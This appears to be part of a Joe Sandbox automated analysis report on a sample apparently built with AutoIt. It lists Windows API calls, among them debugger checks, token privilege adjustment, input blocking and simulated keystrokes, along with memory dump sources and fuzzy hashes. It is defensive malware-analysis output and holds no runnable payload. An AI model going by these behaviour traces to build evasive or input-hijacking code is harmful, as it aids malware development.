                                    • Opcode ID: 651589ccb9721d0346af272ff0e79afe8e5e321c397516b85e0c19dd35bf82b2
                                    • Instruction ID: 2f42d0afdd1fa285024436f40b838e8accf6344e75914ffb87019b20c4156870
                                    • Opcode Fuzzy Hash: 651589ccb9721d0346af272ff0e79afe8e5e321c397516b85e0c19dd35bf82b2
                                    • Instruction Fuzzy Hash: 5B219AB154030D9BEB21CF65CA48BA6B7FCEF40314F10881AE64692251E778AA048B60
                                    APIs
                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 007E82AA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: lstrlen
                                    • String ID: ($|
                                    • API String ID: 1659193697-1631851259
                                    • Opcode ID: c44f5ec6e81791c4ebae645d9a8c280d8f8a01435d1d2db6e8a53b76b2074986
                                    • Instruction ID: 4149a0571ed236324e38503a483f882b529b52c7ae15d1ebbdb096b09a7172e2
                                    • Opcode Fuzzy Hash: c44f5ec6e81791c4ebae645d9a8c280d8f8a01435d1d2db6e8a53b76b2074986
                                    • Instruction Fuzzy Hash: 42324474A00745DFCB68CF5AC080A6AB7F0FF48710B15856EE59ADB3A1EB74E981CB41
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?), ref: 007F5CC1
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 007F5D17
                                    • FindClose.KERNEL32(?), ref: 007F5D5F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Find$File$CloseFirstNext
                                    • String ID:
                                    • API String ID: 3541575487-0
                                    • Opcode ID: 46a226c69011e2bdc324d934b9a8ec8fcfffb0ccf52564e69f53fef4b3fafaf6
                                    • Instruction ID: eed8a23cf819f42970bc96aad37c081ac2f08df73d8ffc5ac34dbff8bdd5e8ce
                                    • Opcode Fuzzy Hash: 46a226c69011e2bdc324d934b9a8ec8fcfffb0ccf52564e69f53fef4b3fafaf6
                                    • Instruction Fuzzy Hash: 2D519B74704A05DFC714DF28C498AA6B7E4FF49324F14855DEA6A8B3A1DB34EC04CB91
                                    APIs
                                    • IsDebuggerPresent.KERNEL32 ref: 007B271A
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 007B2724
                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 007B2731
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                    • String ID:
                                    • API String ID: 3906539128-0
                                    • Opcode ID: 536550a4753985429dead9b0f17f1531643699ae78d3b66b092bde095601cdc7
                                    • Instruction ID: 9463945405aebe5e95515f5e2247881b2fa789b7506ebf071bc4ff169c055651
                                    • Opcode Fuzzy Hash: 536550a4753985429dead9b0f17f1531643699ae78d3b66b092bde095601cdc7
                                    • Instruction Fuzzy Hash: E231D5749412189BCB21DF68DC887DCB7B8BF08310F5082EAE41CA7261EB349F818F44
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 007F51DA
                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 007F5238
                                    • SetErrorMode.KERNEL32(00000000), ref: 007F52A1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ErrorMode$DiskFreeSpace
                                    • String ID:
                                    • API String ID: 1682464887-0
                                    • Opcode ID: 45b5113f94b774295eda33cfed0e116e81b9f2e0165224c362974530584c9fc9
                                    • Instruction ID: 47d10881aedd4e43c2ec95dd6d35729b6c5b91f70966c1ed9d449fc1410f0be2
                                    • Opcode Fuzzy Hash: 45b5113f94b774295eda33cfed0e116e81b9f2e0165224c362974530584c9fc9
                                    • Instruction Fuzzy Hash: 78316F75A00518DFDB00DF54D888EADBBB4FF49318F088099E905AB362DB35EC55CBA0
                                    APIs
                                      • Part of subcall function 0079FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 007A0668
                                      • Part of subcall function 0079FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 007A0685
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007E170D
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007E173A
                                    • GetLastError.KERNEL32 ref: 007E174A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                    • String ID:
                                    • API String ID: 577356006-0
                                    • Opcode ID: fb29f1fd7ac9f6c25950f5f41f8058c492e362a3f901e18445ce32835e650598
                                    • Instruction ID: 90c46c281033b348ac764ba9a1d2733a69837e16fe23b4e621fda8aad46d2b19
                                    • Opcode Fuzzy Hash: fb29f1fd7ac9f6c25950f5f41f8058c492e362a3f901e18445ce32835e650598
                                    • Instruction Fuzzy Hash: 0911C1B2510304AFD7189F55EC86DAAB7BDFF08714B20852EE05697241EB74BC41CB20
                                    APIs
                                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007ED608
                                    • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 007ED645
                                    • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007ED650
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: CloseControlCreateDeviceFileHandle
                                    • String ID:
                                    • API String ID: 33631002-0
                                    • Opcode ID: 9ca57c4c1ab65718f6b529b051876f88f48c543699973ae87a0e2acd37937d4b
                                    • Instruction ID: 4fe1fbd6f3ad46ae0ee665fa76e8b1008edb8d0e37a8d751955dc5e8cc7f3225
                                    • Opcode Fuzzy Hash: 9ca57c4c1ab65718f6b529b051876f88f48c543699973ae87a0e2acd37937d4b
                                    • Instruction Fuzzy Hash: 81113C75E45228BBDB208F95AC45FEFBBBCEB49B50F108115F914E7290D6704A058BA1
                                    APIs
                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 007E168C
                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 007E16A1
                                    • FreeSid.ADVAPI32(?), ref: 007E16B1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                    • String ID:
                                    • API String ID: 3429775523-0
                                    • Opcode ID: 6463c54fae06877e0b59209a4eae85cf89073f4cf0f9150933da4349117507f7
                                    • Instruction ID: 5141e23dd69e340eaa784078012efd95185b1a3a14b7ef3ebde28c42572ebf62
                                    • Opcode Fuzzy Hash: 6463c54fae06877e0b59209a4eae85cf89073f4cf0f9150933da4349117507f7
                                    • Instruction Fuzzy Hash: 22F0F471990309FBDB00DFE49C89EAEBBBCFF08604F508565E501E2181E774AA448A50
                                    APIs
                                    • GetCurrentProcess.KERNEL32(007B28E9,?,007A4CBE,007B28E9,008488B8,0000000C,007A4E15,007B28E9,00000002,00000000,?,007B28E9), ref: 007A4D09
                                    • TerminateProcess.KERNEL32(00000000,?,007A4CBE,007B28E9,008488B8,0000000C,007A4E15,007B28E9,00000002,00000000,?,007B28E9), ref: 007A4D10
                                    • ExitProcess.KERNEL32 ref: 007A4D22
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Process$CurrentExitTerminate
                                    • String ID:
                                    • API String ID: 1703294689-0
                                    • Opcode ID: e6ffb99a331a215a8e0d919a99775f63c2775821700ddf00a4b42443e6aca0d9
                                    • Instruction ID: f3aba2855a94e87f90d4af9d973f37a67fd70a2c8728a5852db436d2a94d9c6b
                                    • Opcode Fuzzy Hash: e6ffb99a331a215a8e0d919a99775f63c2775821700ddf00a4b42443e6aca0d9
                                    • Instruction Fuzzy Hash: 56E0B631140548BBCF11AF64DD09A987B7DFF82785B108114FE158A222DB7ADE42CA80
                                    APIs
                                    • GetUserNameW.ADVAPI32(?,?), ref: 007DD28C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: NameUser
                                    • String ID: X64
                                    • API String ID: 2645101109-893830106
                                    • Opcode ID: 445818ea39b1451389ef8354e75e833269855ff7a3ee531c93bc013b8fba3232
                                    • Instruction ID: b5803644003edd0590a93b722eef7ab904c3f180b45a3bc5c9eb8cd9e5c5d245
                                    • Opcode Fuzzy Hash: 445818ea39b1451389ef8354e75e833269855ff7a3ee531c93bc013b8fba3232
                                    • Instruction Fuzzy Hash: 34D0C9B480111DEACFA4CB90ED88DD9B37CBB14345F104152F146E2100D77499488F10
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                    • Instruction ID: c0de05c59713b00922d74cb38e4397d428d5c9d0b7b7dde4d333507b126c31cd
                                    • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                    • Instruction Fuzzy Hash: 86023E72E00219AFDF15CFA9C8806ADFBF1EF89324F254269D919E7341D735AD418B90
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?), ref: 007F6918
                                    • FindClose.KERNEL32(00000000), ref: 007F6961
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Find$CloseFileFirst
                                    • String ID:
                                    • API String ID: 2295610775-0
                                    • Opcode ID: 0aacb2e0c45c67a510c87d1630f0a75c3877e8671813cc4f54350fb71e00131a
                                    • Instruction ID: fdcfd924041d1ee4bc358d73edcdf61297565564abe000cd8b401b7220237a7d
                                    • Opcode Fuzzy Hash: 0aacb2e0c45c67a510c87d1630f0a75c3877e8671813cc4f54350fb71e00131a
                                    • Instruction Fuzzy Hash: 79118E716042049FD710DF29D488A26BBE5FF85328F14C69DE5698F7A2C774EC05CB91
                                    APIs
                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00804891,?,?,00000035,?), ref: 007F37E4
                                    • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00804891,?,?,00000035,?), ref: 007F37F4
                                    APIs
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 007EB25D
                                    • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 007EB270
                                    APIs
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007E11FC), ref: 007E10D4
                                    • CloseHandle.KERNEL32(?,?,007E11FC), ref: 007E10E9
                                    Strings
                                    • Variable is not of type 'Object'., xrefs: 007D0C40
                                    APIs
                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,007B6766,?,?,00000008,?,?,007BFEFE,00000000), ref: 007B6998
                                    APIs
                                    • BlockInput.USER32(00000001), ref: 007FEABD
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,007A03EE), ref: 007A09DA
                                    • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                    • Instruction Fuzzy Hash: 4D8151726090E349FB6D823A853443EFFE15AD33B1B5A079DD4F2CA1C1EE2C9954E620
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1707404067.0000000001E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1e40000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                    • Instruction ID: c01750d4d230db9ea3015ea1137802599cd62f1c37fd534d96d1b0fe6b2827f8
                                    • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                    • Instruction Fuzzy Hash: 0341D271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a73de648553bdd8d3692fa40446c3bb7708bd8a451c6fa2964373523015dbbf4
                                    • Instruction ID: e38e1583c931a7a846ad53e1b94baa2e19e7770f326c90dda2dbf79941d1ab27
                                    • Opcode Fuzzy Hash: a73de648553bdd8d3692fa40446c3bb7708bd8a451c6fa2964373523015dbbf4
                                    • Instruction Fuzzy Hash: 5B21A5326206158BDB28CE79C82267A73E5B764310F15862EE4A7C37D1DE39A904CB80
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1707404067.0000000001E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1e40000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                    • Instruction ID: 3027e957997cfeea26be0ea98a7a7e2c1b0563c2622ccec2b3256ce8a7df737b
                                    • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                    • Instruction Fuzzy Hash: F7019278A00109EFCB44DF98D5909AEF7F5FB48310F208599D819A7701D734AE41DB80
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1707404067.0000000001E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1e40000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                    • Instruction ID: b9042890f833d8a4d79ca6ac0c7564e6e8f32ca7828d1f5e92a957e5923d7191
                                    • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                    • Instruction Fuzzy Hash: 3101AF78A00219EFCB49DF98D5909AEF7F5FF88310F208599E819A7741E730AE41DB80
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1707404067.0000000001E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1e40000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                    • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                    • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                    • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                    APIs
                                    • DeleteObject.GDI32(00000000), ref: 00802B30
                                    • DeleteObject.GDI32(00000000), ref: 00802B43
                                    • DestroyWindow.USER32 ref: 00802B52
                                    • GetDesktopWindow.USER32 ref: 00802B6D
                                    • GetWindowRect.USER32(00000000), ref: 00802B74
                                    • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00802CA3
                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00802CB1
                                    • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00802CF8
                                    • GetClientRect.USER32(00000000,?), ref: 00802D04
                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00802D40
                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00802D62
                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00802D75
                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00802D80
                                    • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00802D89
                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00802D98
                                    • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00802DA1
                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00802DA8
                                    • GlobalFree.KERNEL32(00000000), ref: 00802DB3
                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00802DC5
                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,0081FC38,00000000), ref: 00802DDB
                                    • GlobalFree.KERNEL32(00000000), ref: 00802DEB
                                    • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00802E11
                                    • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00802E30
                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00802E52
                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0080303F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                    • String ID: $AutoIt v3$DISPLAY$static
                                    • API String ID: 2211948467-2373415609
                                    APIs
                                    • SetTextColor.GDI32(?,00000000), ref: 0081712F
                                    • GetSysColorBrush.USER32(0000000F), ref: 00817160
                                    • GetSysColor.USER32(0000000F), ref: 0081716C
                                    • SetBkColor.GDI32(?,000000FF), ref: 00817186
                                    • SelectObject.GDI32(?,?), ref: 00817195
                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 008171C0
                                    • GetSysColor.USER32(00000010), ref: 008171C8
                                    • CreateSolidBrush.GDI32(00000000), ref: 008171CF
                                    • FrameRect.USER32(?,?,00000000), ref: 008171DE
                                    • DeleteObject.GDI32(00000000), ref: 008171E5
                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00817230
                                    • FillRect.USER32(?,?,?), ref: 00817262
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00817284
                                      • Part of subcall function 008173E8: GetSysColor.USER32(00000012), ref: 00817421
                                      • Part of subcall function 008173E8: SetTextColor.GDI32(?,?), ref: 00817425
                                      • Part of subcall function 008173E8: GetSysColorBrush.USER32(0000000F), ref: 0081743B
                                      • Part of subcall function 008173E8: GetSysColor.USER32(0000000F), ref: 00817446
                                      • Part of subcall function 008173E8: GetSysColor.USER32(00000011), ref: 00817463
                                      • Part of subcall function 008173E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00817471
                                      • Part of subcall function 008173E8: SelectObject.GDI32(?,00000000), ref: 00817482
                                      • Part of subcall function 008173E8: SetBkColor.GDI32(?,00000000), ref: 0081748B
                                      • Part of subcall function 008173E8: SelectObject.GDI32(?,?), ref: 00817498
                                      • Part of subcall function 008173E8: InflateRect.USER32(?,000000FF,000000FF), ref: 008174B7
                                      • Part of subcall function 008173E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 008174CE
                                      • Part of subcall function 008173E8: GetWindowLongW.USER32(00000000,000000F0), ref: 008174DB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
